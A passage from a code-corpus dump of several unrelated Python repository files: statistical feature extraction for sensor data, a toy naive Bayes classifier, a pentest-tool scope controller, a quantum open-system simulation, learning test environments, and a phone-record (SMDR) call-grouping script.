SENSORS:\n if j == 'z' or j == 'x':\n b, a = signal.butter(4, 0.05)\n filtered_z = signal.filtfilt(b, a, unnest_data(data_c[j]))\n data[f'{j}_raw'].iloc[i] = filtered_z.tolist()\n else:\n data[f'{j}_raw'].iloc[i] = unnest_data(data_c[j])\n \n return data\n\ndef chunkify(lst, start, end, time_frame=10):\n \"\"\"\n prepare data for division\n 
\"\"\"\n bins= math.floor((end-start)/time_frame)\n if bins>0:\n n = math.floor(len(lst)/bins)\n new_list = [lst[i:i+n] for i in range(0,len(lst),n)]\n if len(lst)%math.floor((end-start)/time_frame)>0:\n new_list=new_list[:-1]\n return new_list\n else:\n return [lst]\n \ndef expand_data(df, column_name, time_frame):\n \"\"\"\n divide data into desired timespans \n \"\"\"\n new_df=pd.DataFrame()\n id_list=[]\n new_list=[]\n for i in range(0, df.shape[0]):\n new_list.append(chunkify(df[column_name].iloc[i],*df.iloc[i,[4,5]],time_frame))\n id_list.append([df['id'].iloc[i]]*len(new_list[i]))\n new_list = list(itertools.chain.from_iterable(new_list))\n new_df=new_df.append(pd.DataFrame({column_name:new_list}))\n new_df['id']=list(itertools.chain.from_iterable(id_list))\n new_df=new_df.set_index('id')\n return new_df\n\n\"Section II: calculate features\"\n\ndef median (df, sensors):\n for i in sensors:\n df[f'{i}_sorted'] = [sorted (df[f'{i}_raw'].iloc[j]) for j in range(0, df.shape[0])]\n for j in range(0, df.shape[0]):\n if len(df [f\"{i}_sorted\"].iloc[j])%2==0:\n k = int(len (df[f\"{i}_sorted\"].iloc[j])/2)\n df[f\"{i}_median\"] = (df[f\"{i}_sorted\"].iloc[j][k-1]+df[f\"{i}_sorted\"].iloc[j][k])/2\n else:\n k = int((len (df[f\"{i}_sorted\"].iloc[j])-1)/2)\n df[f\"{i}_median\"] = df [f\"{i}_sorted\"].iloc[j][k]\n return df\n \ndef calculate_median (df, sensors):\n for i in sensors:\n df[f'{i}_sorted'] = [sorted (df[f'{i}_raw'].iloc[j]) for j in range(0, df.shape[0])]\n for j in range(0, df.shape[0]):\n if len(df [f\"{i}_sorted\"].iloc[j])%2==0:\n k = int(len (df[f\"{i}_sorted\"].iloc[j])/2)\n df[f\"{i}_median\"].iloc[j] = (df[f\"{i}_sorted\"].iloc[j][k-1]+df[f\"{i}_sorted\"].iloc[j][k])/2\n else:\n k = int((len (df[f\"{i}_sorted\"].iloc[j])-1)/2)\n df[f\"{i}_median\"].iloc[j] = df [f\"{i}_sorted\"].iloc[j][k]\n return df \n \ndef calculate_mean (df, sensors):\n for i in sensors:\n df[f'{i}_mean'] = [sum (df[f'{i}_raw'].iloc[j])/len (df[f'{i}_raw'].iloc[j]) for j in range(0, df.shape[0])]\n \n return df\n \ndef var (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n var_lst = [(df[f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**2 for k in range (0, len (df [f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_var\"] = sum (var_lst)/len (var_lst)\n \n return df \n \ndef calculate_var (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n var_lst = [(df[f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**2 for k in range (0, len (df [f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_var\"].iloc[j] = sum (var_lst)/len (var_lst)\n \n return df \n \ndef std (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_std\"]= df [f\"{i}_var\"].iloc[j]**0.5 \n \n return df \n \ndef calculate_std (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_std\"].iloc[j]= df [f\"{i}_var\"].iloc[j]**0.5 \n \n return df \n\ndef variation (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_variation\"] = df [f\"{i}_std\"].iloc[j]/df[f\"{i}_mean\"].iloc[j] \n \n return df\n \ndef calculate_variation (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_variation\"].iloc[j] = df [f\"{i}_std\"].iloc[j]/df[f\"{i}_mean\"].iloc[j] \n \n return df\n\ndef skw (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n skw_lst = [(df [f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**3 for k in range (0, len (df [f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_skw\"] = sum (skw_lst)/len 
(skw_lst)\n\n return df\n\ndef calculate_skw (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n skw_lst = [(df [f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**3 for k in range (0, len (df [f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_skw\"].iloc[j] = sum (skw_lst)/len (skw_lst)\n\n return df\n\ndef skew (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df[f\"{i}_skew\"]= df[f\"{i}_skw\"].iloc[j]/(df[f\"{i}_std\"].iloc[j]**3)\n\n return df\n\ndef calculate_skew (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df[f\"{i}_skew\"].iloc[j]= df[f\"{i}_skw\"].iloc[j]/(df[f\"{i}_std\"].iloc[j]**3)\n\n return df\n\ndef krt (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n krt_lst = [(df[f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**4 for k in range (0, len (df[f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_krt\"] = sum (krt_lst)/len (krt_lst)\n \n return df\n\ndef calculate_krt (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n krt_lst = [(df[f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**4 for k in range (0, len (df[f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_krt\"].iloc[j] = sum (krt_lst)/len (krt_lst)\n \n return df\n\ndef kurtosis (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_kurtosis\"]= (df [f\"{i}_krt\"].iloc[j]/(df [f\"{i}_std\"].iloc[j]**4))-3\n\n return df\n\ndef calculate_kurtosis (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_kurtosis\"].iloc[j]= (df [f\"{i}_krt\"].iloc[j]/(df [f\"{i}_std\"].iloc[j]**4))-3\n\n return df\n\ndef tvar (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n var_lst = [(df [f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**2 for k in range (0, len (df[f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_tvar\"] = sum (var_lst)/(len (var_lst) -1) \n \n return df\n\ndef calculate_tvar (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n var_lst = [(df [f\"{i}_raw\"].iloc[j][k]-df[f\"{i}_mean\"].iloc[j])**2 for k in range (0, len (df[f\"{i}_raw\"].iloc[j]))]\n df [f\"{i}_tvar\"].iloc[j] = sum (var_lst)/(len (var_lst) -1) \n \n return df\n\ndef kstat(data, n=2):\n if n > 4 or n < 1:\n raise ValueError(\"k-statistics only supported for 1<=n<=4\")\n n = int(n)\n S = np.zeros(n + 1, np.float64)\n data = ravel(data)\n N = data.size\n if N == 0:\n raise ValueError(\"Data input must not be empty\")\n\n # on nan input, return nan without warning\n if np.isnan(np.sum(data)):\n return np.nan\n\n for k in range(1, n + 1):\n S[k] = np.sum(data**k, axis=0)\n if n == 1:\n return S[1] * 1.0/N\n elif n == 2:\n return (N*S[2] - S[1]**2.0) / (N*(N - 1.0))\n elif n == 3:\n return (2*S[1]**3 - 3*N*S[1]*S[2] + N*N*S[3]) / (N*(N - 1.0)*(N - 2.0))\n elif n == 4:\n return ((-6*S[1]**4 + 12*N*S[1]**2 * S[2] - 3*N*(N-1.0)*S[2]**2 -\n 4*N*(N+1)*S[1]*S[3] + N*N*(N+1)*S[4]) /\n (N*(N-1.0)*(N-2.0)*(N-3.0)))\n else:\n raise ValueError(\"Should not be here.\")\n \ndef kstatvar(data, n=2):\n data = ravel(data)\n N = len(data)\n if n == 1:\n return kstat(data, n=2) * 1.0/N\n elif n == 2:\n k2 = kstat(data, n=2)\n k4 = kstat(data, n=4)\n return (2*N*k2**2 + (N-1)*k4) / (N*(N+1))\n else:\n raise ValueError(\"Only n=1 or n=2 supported.\")\n \ndef calculate_kstat (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df [f\"{i}_kstatvar\"] = kstatvar (df [f\"{i}_raw\"].iloc[j])\n \n return df\n\ndef calculate_kstatvar (df, sensors):\n for i in sensors:\n for j in range(0, df.shape[0]):\n df 
[f\"{i}_kstatvar\"].iloc[j] = kstatvar (df [f\"{i}_raw\"].iloc[j])\n \n return df\n\n \n","repo_name":"NMildred/Metrics_calculation","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":10517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41078527807","text":"import numpy as np\n\n\ndef load_data():\n data_list = [['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],\n ['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],\n ['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],\n ['stop', 'posting', 'stupid', 'worthless', 'garbage'],\n ['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],\n ['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]\n class_vec = [0, 1, 0, 1, 0, 1]\n return data_list, class_vec\n\n\ndef create_vocab_database(data_set):\n vocab_set = set()\n for document in data_set:\n vocab_set = vocab_set | set(document)\n return list(vocab_set)\n\n\ndef input_transform_vocab(vocab_database, input_txt):\n vocab_vec = [0] * len(vocab_database)\n for word in input_txt:\n if word in vocab_database:\n vocab_vec[vocab_database.index(word)] += 1\n return vocab_vec\n\n\ndef article_2_word_bag(vocab_database, input_article):\n mat = []\n for row in input_article:\n mat.append(input_transform_vocab(vocab_database, row))\n return mat\n\n\ndef train_naive_bayes(data_mat, class_label):\n pcw = []\n denom = []\n pc = []\n data_mat_count = len(data_mat)\n word_num = len(data_mat[0])\n class_count = len(set(class_label))\n for i in range(class_count):\n pc.append(len([a for a in class_label if a == i]))\n pcw.append(np.ones(word_num))\n denom.append(word_num)\n pc = np.asarray(pc) / data_mat_count\n for i in range(data_mat_count):\n for j in range(class_count):\n if class_label[i] == j:\n pcw[j] += data_mat[i]\n denom[j] += sum(data_mat[i])\n for i in range(class_count):\n pcw[i] = np.log(pcw[i] / denom[i])\n return pcw, pc\n\n\ndef classify(pcw, pc, input_txt):\n p = []\n class_count = len(pc)\n for i in range(class_count):\n p.append(sum(input_txt * pcw[i]) + np.log(pc[i]))\n print(p)\n return p.index(sorted(p, reverse=True)[0])\n\n\nif __name__ == '__main__':\n train_data, train_label = load_data()\n vocab_data = create_vocab_database(train_data)\n print(vocab_data)\n cw, c = train_naive_bayes(article_2_word_bag(vocab_data, train_data), train_label)\n print(cw[0])\n print('---------------------------------')\n print(cw[1])\n testEntry1 = ['love', 'my', 'dalmation']\n thisEntry2 = ['stupid', 'garbage']\n this = np.array(input_transform_vocab(vocab_data, thisEntry2))\n result = classify(cw, c, this)\n print(result)\n","repo_name":"HanGaaaaa/MLAProject","sub_path":"Bayes/naiveBayes.py","file_name":"naiveBayes.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38291337926","text":"from pollenisatorcli.core.Controllers.ElementController import ElementController\n\nclass ScopeController(ElementController):\n def doInsert(self, values):\n toInsert = dict()\n for param_name in values:\n db_name = self.paramNameToDbName(param_name)\n if db_name is not None:\n # Update in database\n toInsert[db_name] = values[param_name]\n scopes = toInsert[\"scope\"]\n err_count = 0\n ret = []\n for scope in scopes:\n toInsert[\"scope\"] = scope\n self.model.__init__(toInsert)\n # Insert in database\n to_ret, _ = self.model.addInDb()\n if not ret:\n err_count += 1\n else:\n 
ret.append(to_ret)\n # Fetch the instance of this self.model now that it is inserted.\n return ret, err_count # 0 errors","repo_name":"fbarre96/PollenisatorCLI","sub_path":"pollenisatorcli/core/Controllers/ScopeController.py","file_name":"ScopeController.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39675041649","text":"\"\"\"\nCalculate the evolution of the density matrix of the composite system\nwith finite interaction time TIMEDELTA.\nCan we use the interaction time as control parameter?\n\nTIMEDELTAS\n0.01, 0.05, 0.1, 0.5, 1, 5, 10\n!!! After 2pi the evolution should repeat itself\nFor the paper we use:\n0.05 - 20'000 iterations\n0.1 - 6'000 iterations\n1.0 - 1000 iterations\n\nIn simulations, with phi=pi/2 we have:\n KT = 1 -> alpha = 1/Sqrt[1 + 2 e]\n KT = 2 -> alpha = 1/Sqrt[1 + 2 e^(1/2)]\n\nTry to change alpha and phi as to have the same KT but with different dynamics\n(Kraus operators does change with gamma alpha and gamma beta).\n\nKT = 1\n____________________\n phi | alpha\n 0 | 0.518596 1/Sqrt[1 + E]\n pi/6 | 0.505499 1/Sqrt[1 - 4 (-2 + Sqrt[3]) E]\n pi/4 | 0.488843 1/Sqrt[1 - 2 (-2 + Sqrt[2]) E]\n pi/3 | 0.465022 Sqrt[3/(3 + 4 E)]\n pi/2 | 0.394160 1/Sqrt[1 + 2 E]\n pi | inf\n\nKT = 2\n____________________\n phi | alpha\n 0 | 0.614443 1/Sqrt[1 + Sqrt[E]]\n pi/6 | 0.601157 1/Sqrt[1 - 4 (-2 + Sqrt[3]) Sqrt[E]]\n pi/4 | 0.584047 1/Sqrt[1 - 2 (-2 + Sqrt[2]) Sqrt[E]]\n pi/3 | 0.559166 Sqrt[3/(3 + 4 Sqrt[E])]\n pi/2 | 0.482386 1/Sqrt[1 + 2 Sqrt[E]]\n pi | inf\n\nPartial evolution should highlight real-evolution stroboscopic points.\n\"\"\"\nimport cmath\nimport math\n\nimport pandas as pd\nfrom qutip import Qobj, tensor\n\nimport numpy as np\n\ntry:\n import utilities as use\n from physics import *\n from stateobj import Physics\n from observables import entropy_vn, purity, covariance, heat_transfer\n from utilities import default_alpha, default_phi\nexcept ModuleNotFoundError:\n import src.utilities as use\n from src.physics import *\n from src.stateobj import Physics\n from src.observables import entropy_vn, purity, covariance, heat_transfer\n from src.utilities import default_alpha, default_phi\n\n\ndef setup_experiment(dims, timedelta, **kwargs):\n omega = kwargs.get('omega', 1)\n # Ancilla parameters\n alpha = kwargs.get('alpha', default_alpha())\n phi = kwargs.get('phi', default_phi())\n # Cavities parameters\n state = kwargs.get('state', 'thermal')\n n1 = kwargs.get('n1', 1)\n n2 = kwargs.get('n2', 1)\n experiment = Physics(dimension=dims,\n interaction_strength=omega, interaction_time=timedelta,\n alpha=alpha,\n phi=phi)\n experiment.create_system(state, n=n1, alpha=n1, name='rho1')\n experiment.create_system(state, n=n2, alpha=n2, name='rho2')\n\n # Check if a steady state exists\n if experiment.ga / experiment.gb < 1:\n print(f'The system will thermalize at temperature {experiment.stable_temperature}.')\n else:\n print('The system will not thermalize.')\n\n return experiment\n\n\ndef get_root(dm_type):\n try:\n root = f'../objects/{dm_type}/'\n os.listdir(root)\n except FileNotFoundError:\n root = f'objects/{dm_type}/'\n return root\n\n\ndef file_dims(filename):\n return int(filename.split('_')[-3][1:])\n\n\ndef file_time(filename):\n return int(filename.split('_')[-2][1:])\n\n\ndef file_timedelta(filename):\n return float(filename.split('_')[-1][2:])\n\n\ndef check_file(filename, d, dt, log_id='000'):\n filename = filename.removesuffix('.npy')\n try:\n dims = 
file_dims(filename)\n timedelta = file_timedelta(filename)\n except IndexError:\n return False\n else:\n if log_id != '000':\n return filename.startswith(f'{log_id}_rho_last_') and dims == d and timedelta == dt\n else:\n return filename.startswith('rho_last_') and dims == d and timedelta == dt\n\n\ndef load_or_create(experiment, log_id, create=False):\n \"\"\"\n Create a new product state or load it from the last saved evolution file.\n Returns the state and the last time step.\n \"\"\"\n suffix = '.npy'\n rho1 = experiment.systems['rho1']['density']\n rho2 = experiment.systems['rho2']['density']\n dm_type = experiment.systems['rho1']['type']\n dims = experiment.dims\n dt = experiment.dt\n root_folder = get_root(dm_type)\n files = [f.removesuffix(suffix) for f in os.listdir(root_folder) if check_file(f, dims, dt, log_id)]\n times = [file_time(f) for f in files]\n if files and not create:\n # There are files to load\n last_t = max(times)\n log_id = log_id + '_' if log_id != '000' else ''\n rho = np.load(root_folder + log_id + f'rho_last_D{dims}_t{last_t}_dt{dt}' + suffix)\n covariances = np.load(root_folder + log_id + f'rho_covariance_D{dims}_t{last_t}_dt{dt}' + suffix).tolist()\n try:\n heats = np.load(root_folder + log_id + f'rho_heats_D{dims}_t{last_t}_dt{dt}' + suffix).tolist()\n except FileNotFoundError:\n print(\"Heats not loaded\")\n heats = None\n print(f'Saved files exists until time {last_t}')\n return rho, covariances, heats, last_t\n else:\n rho = np.kron(rho1.full(), rho2.full()).real\n covariances = [covariance(rho, experiment.quadratures)]\n heats = [(0, 0, 0)]\n return rho, covariances, heats, 0\n\n\ndef thermal_ancilla(alpha):\n return [[alpha**2, 0, 0], [0, (1 - alpha**2) / 2, 0], [0, 0, (1 - alpha**2) / 2]]\n\n\ndef _unitary_evolution(system, physic_object: Physics):\n rho_d = physic_object.dims\n # Create thermal ancilla\n ancilla = thermal_ancilla(physic_object._alpha)\n # Create composite system-ancilla state\n sigma = tensor(\n Qobj(system, dims=[[rho_d, rho_d], [rho_d, rho_d]]),\n Qobj(ancilla)\n )\n dt = physic_object.dt\n new_rho = unitary_evolution(sigma, dt, physic_object.V1 + physic_object.V2)\n return new_rho.full()\n\n\ndef _heat_transfer(dr, experiment):\n h1 = experiment.h1.full()\n h2 = experiment.h2.full()\n h = h1 + h2\n j1 = heat_transfer(dr, h1)\n j2 = heat_transfer(dr, h2)\n jc = j1 + j2\n return [j1, j2, jc]\n\n\ndef hilbert_is_good(system, check):\n \"\"\"Check if the Hilbert space truncation is valid\"\"\"\n threshold = 1e-9\n if check == 'unitary':\n diagonal_sum = np.sum(system.diagonal())\n return np.abs(diagonal_sum - 1) < threshold\n elif check == 'last_element':\n last_diagonal_element = system.diagonal()[-1]\n return last_diagonal_element < threshold\n else:\n raise ValueError('Check must be either \"unitary\" or \"last_element\".')\n\n\ndef meq_evolution(time, experiment, rho, covariances, partial, exact_evolution=False):\n for t in time:\n old_rho = rho\n rho = _unitary_evolution(old_rho, experiment)\n if not hilbert_is_good(rho, 'last_element'):\n print(f'Hilbert space truncation is no more valid at step {t}')\n break\n else:\n covariances.append(covariance(rho, experiment.quadratures))\n return rho, covariances\n\n\ndef save_data(dims, timedelta, t, covariances, last_rho, heat_transfers=None, **kwargs):\n dm_type = kwargs.get('state', 'thermal')\n root_folder = get_root(dm_type)\n log_id = kwargs.get('id', '000')\n if log_id == '000':\n log_id = use.get_last_id(root_folder)\n # Save data\n np.save(root_folder + 
f'{log_id}_rho_covariance_D{dims}_t{t}_dt{timedelta}', covariances)\n if heat_transfers is not None:\n np.save(root_folder + f'{log_id}_rho_heats_D{dims}_t{t}_dt{timedelta}', heat_transfers)\n np.save(root_folder + f'{log_id}_rho_last_D{dims}_t{t}_dt{timedelta}', last_rho)\n\n\ndef main(dims=20, timedelta=1.0, show_plots=False, **kwargs):\n print(f'Starting evolution of {dims}-dimensional system with interaction time {timedelta}.')\n log_id = kwargs.get('id', '000')\n experiment = setup_experiment(dims, timedelta, **kwargs)\n rho1, rho2 = experiment.systems['rho1'], experiment.systems['rho2']\n # Create new product state and observables or load them evolved until time t\n rho, covariances, heat_transfers, t = load_or_create(experiment, log_id)\n\n max_timesteps = kwargs.get('max_timesteps', 0)\n if kwargs.get('max_timesteps', 0) == 0:\n timesteps = int(2000 / timedelta)\n max_timesteps = timesteps\n time = trange(t, t + max_timesteps)\n # Evolve density and save observables\n rho, covariances = meq_evolution(\n time, experiment, rho, covariances,\n kwargs.get('partial', 0), kwargs.get('exact', False)\n )\n\n save_data(dims, timedelta, t + max_timesteps, covariances, rho, **kwargs)\n\n\nif __name__ == '__main__':\n d = 25\n dt = 0.4\n kwargs = {\n 'id': 'ZZZZZZ',\n 'state': 'thermal',\n 'n1': 1,\n 'n2': 1,\n }\n\n main(d, dt, max_timesteps=300, alpha=1/3, phi=0.559983219, **kwargs)\n","repo_name":"fedesss98/phaseonium-evolution","sub_path":"src/rho_unphased_evolution.py","file_name":"rho_unphased_evolution.py","file_ext":"py","file_size_in_byte":8682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15097975095","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\nimport scicfg\nimport environments as envs\n\nimport dotdot\nfrom learners import tools\n\n\nclass RandomEnv(envs.Environment):\n\n def __init__(self, mbounds):\n self.m_channels = [envs.Channel('m_{}'.format(i), mb_i) for i, mb_i in enumerate(mbounds)]\n self.s_channels = [envs.Channel('s_0'),\n envs.Channel('s_1'),\n envs.Channel('s_3')]\n\n self._cfg = scicfg.SciConfig()\n self._cfg.m_channels = self.m_channels\n self._cfg.s_channels = self.s_channels\n self._cfg._freeze(True)\n\n @property\n def cfg(self):\n return self._cfg\n\n def _execute(self, m_signal, meta=None):\n return tools.random_signal(self.s_channels)\n\nclass RandomLinear(RandomEnv):\n\n def __init__(self, m_bounds, s_dim):\n self.m = np.random.random((s_dim, len(m_bounds)))\n\n self.m_channels = [envs.Channel('m_{}'.format(i), mb_i) for i, mb_i in enumerate(m_bounds)]\n self.s_channels = [envs.Channel('s_{}'.format(i)) for i in range(s_dim)]\n\n self._cfg = scicfg.SciConfig()\n self._cfg.m_channels = self.m_channels\n self._cfg.s_channels = self.s_channels\n self._cfg._freeze(True)\n\n def _execute(self, m_signal, meta=None):\n m_vector = np.array([[m_signal[c.name] for c in self.m_channels]])\n s_vector = (np.dot(self.m, m_vector.T).T)[0]\n return tools.to_signal(s_vector, self.s_channels)\n\n\n\nclass SimpleEnv(RandomEnv):\n\n def __init__(self):\n m_bounds = ((0.0, 1.0), (0.0, 1.0))\n self.m_channels = [envs.Channel(i, mb_i) for i, mb_i in enumerate(m_bounds)]\n self.s_channels = [envs.Channel(i) for i in enumerate((2, 3))]\n\n self._cfg = scicfg.SciConfig()\n self._cfg.m_channels = self.m_channels\n self._cfg.s_channels = self.s_channels\n self._cfg._freeze(True)\n\n def _execute(self, m_signal, meta=None):\n m_vector = tools.to_vector(m_signal, 
self.m_channels)\n s_vector = (m_vector[0] + m_vector[1], m_vector[0]*m_vector[1])\n return tools.to_signal(s_vector, self.s_channels)\n\n\nclass BoundedRandomEnv(RandomEnv):\n\n def __init__(self, mbounds, sbounds):\n self.m_channels = [envs.Channel('m_{}'.format(i), mb_i) for i, mb_i in enumerate(mbounds)]\n self.s_channels = [envs.Channel('s_{}'.format(i), sb_i) for i, sb_i in enumerate(sbounds)]\n\n\nassert issubclass(RandomEnv, envs.Environment)\nassert issubclass(BoundedRandomEnv, envs.Environment)\n","repo_name":"benureau/learners","sub_path":"tests/testenvs.py","file_name":"testenvs.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"6790230295","text":"import re\nimport os\nimport sys\nimport operator\nimport smdrreader\nfrom collections import defaultdict\n\n\ndef debug_print(message, file=sys.stderr):\n if debug_mode is True:\n print(message, file=file)\n\n\ndef read_all_data(file_dict, date):\n all_data = []\n for dir,file in file_dict.items():\n if file is None:\n print('No data file found for {} in {}'.format(\n date.strftime('%Y-%m-%d'),dir), file=sys.stderr)\n continue\n debug_print('{} lines read from file for {}'.format(len(file),\n os.path.basename(dir)))\n for line in file:\n line = line.decode('UTF-8-SIG')\n try:\n event = smdrreader.SMDREvent(line)\n all_data.append(event)\n except smdrreader.InvalidInputException as e:\n if e.severity > 0:\n print(str(e) + ': ' + line.rstrip(), file=sys.stderr)\n else:\n debug_print(str(e) + ': ' + line.rstrip())\n debug_print('{} events processed from dict'.format(len(all_data)))\n return all_data\n\n\ndef add_event(call_id, event, events_by_id, ids_by_events):\n events_by_id[call_id].append(event)\n if id(events_by_id[call_id]) not in ids_by_events:\n ids_by_events[id(events_by_id[call_id])].append(call_id)\n\n\ndef merge_ids(id_one, id_two, events_by_id, ids_by_events):\n debug_print('Merging IDs {} and {}'.format(id_one, id_two))\n if events_by_id[id_one] is not events_by_id[id_two]:\n debug_print('Not already merged')\n events_one = events_by_id[id_one]\n events_two = events_by_id[id_two]\n events_references = []\n events_references.extend(ids_by_events.pop(id(events_one)))\n events_references.extend(ids_by_events.pop(id(events_two)))\n new_events = []\n new_events.extend(events_one)\n new_events.extend(events_two)\n for call_id in events_references:\n events_by_id[call_id] = new_events\n ids_by_events[id(new_events)] = events_references\n else:\n debug_print('Already merged')\n\n\ndef associate_new_id(existing_id, new_id, events_by_id, ids_by_events):\n debug_print('Creating association for new ID {} with existing ID {}'\n .format(new_id, existing_id))\n events_by_id[new_id] = events_by_id[existing_id]\n existing_events_obj_id = id(events_by_id[existing_id])\n ids_by_events[existing_events_obj_id].append(new_id)\n\n\ndef associate_ids(id_one, id_two, events_by_id, ids_by_events):\n if id_one in events_by_id and id_two in events_by_id:\n merge_ids(id_one, id_two, events_by_id, ids_by_events)\n elif id_one in events_by_id and id_two not in events_by_id:\n associate_new_id(id_one, id_two, events_by_id, ids_by_events)\n elif id_two in events_by_id and id_one not in events_by_id:\n associate_new_id(id_two, id_one, events_by_id, ids_by_events)\n else:\n debug_print('Warning: tried to associate two new IDs: {} and {}'\n .format(id_one, id_two))\n\n\ndef group_calls_by_id(call_ids, all_data):\n events_by_id = defaultdict(list)\n 
ids_by_events = defaultdict(list)\n while len(call_ids) > 0:\n assoc_ids = set()\n my_data = all_data[:]\n for event in all_data:\n if event.call_id in call_ids:\n debug_print('Found call ID {} in call_ids'\n .format(event.call_id))\n add_event(event.call_id, event, events_by_id, ids_by_events)\n my_data.remove(event)\n if event.associated_id != '':\n associate_ids(event.associated_id, event.call_id,\n events_by_id, ids_by_events)\n if event.associated_id not in call_ids:\n assoc_ids.add(event.associated_id)\n elif event.associated_id in call_ids:\n debug_print('Found associated ID {} in call_ids'\n .format(event.associated_id))\n associate_ids(event.call_id, event.associated_id,\n events_by_id, ids_by_events)\n add_event(event.call_id, event, events_by_id, ids_by_events)\n my_data.remove(event)\n if event.call_id not in call_ids:\n assoc_ids.add(event.call_id)\n call_ids = assoc_ids\n all_data = my_data\n return events_by_id\n\n\ndef group_all_calls(all_data):\n events_by_id = defaultdict(list)\n ids_by_events = defaultdict(list)\n for event in all_data:\n if event.call_id == ' ':\n continue\n add_event(event.call_id, event, events_by_id, ids_by_events)\n if event.associated_id != '':\n associate_ids(event.associated_id, event.call_id, events_by_id,\n ids_by_events)\n return events_by_id\n\n\ndef get_unique_calls(events_by_id):\n printed_ids = set()\n unique_event_lists = []\n for list in events_by_id.values():\n if id(list) not in printed_ids:\n printed_ids.add(id(list))\n unique_event_lists.append(list)\n return unique_event_lists\n\n\ndef print_calls(unique_event_lists):\n unique_event_lists.sort(key=lambda x: x[0].time)\n unique_event_lists.sort(key=lambda x: x[0].date)\n for list in unique_event_lists:\n print()\n debug_print('Event list id {}:'.format(id(list)), file=sys.stdout)\n print('\\n'.join([str(event) for event in list]))\n return len(unique_event_lists)\n\n\ndef print_anis(unique_event_lists):\n unique_event_lists.sort(key=lambda x: x[0].ani)\n for events in unique_event_lists:\n anis = set()\n for event in events:\n anis.add(event.ani)\n print('\\n'.join(anis))\n\n\ndef sort_calls(call_event_lists):\n debug_print('Sorting calls')\n sorted_event_lists = []\n for event_list in call_event_lists:\n event_list.sort(key=operator.attrgetter('sequence_id'))\n event_list.sort(key=operator.attrgetter('call_id'))\n sorted_event_lists.append(event_list)\n continue\n call_id_lists = {}\n last_call_ids = (None, None)\n last_assoc_id = ''\n for event in event_list:\n if event.associated_id not in [last_assoc_id, '', event.call_id]:\n call_id_lists[(event.call_id, event.associated_id)] = \\\n (last_assoc_id, [event])\n last_assoc_id = event.associated_id\n call_id_lists[(event.call_id, last_assoc_id)].append(event)\n sorted_list = recombine_call_events(call_id_lists)\n if sorted_list is None:\n print('Warning: failed to sort call', file=sys.stderr)\n sorted_event_lists.append(event_list)\n elif len(sorted_list) != len(event_list):\n print('Warning: call events lost during sorting, '\n 'falling back to unsorted', file=sys.stderr)\n sorted_event_lists.append(event_list)\n else:\n sorted_event_lists.append(sorted_list)\n return sorted_event_lists\n\n\ndef recombine_call_events(call_id_lists):\n first_id = None\n for call_id,assoc_id in call_id_lists:\n if assoc_id == '':\n first_id = (call_id, assoc_id)\n break\n if first_id is None:\n return None\n insertions_to_make = []\n for call_id,assoc_id in call_id_lists:\n if assoc_id != '':\n insertions_to_make.append((call_id,assoc_id))\n while 
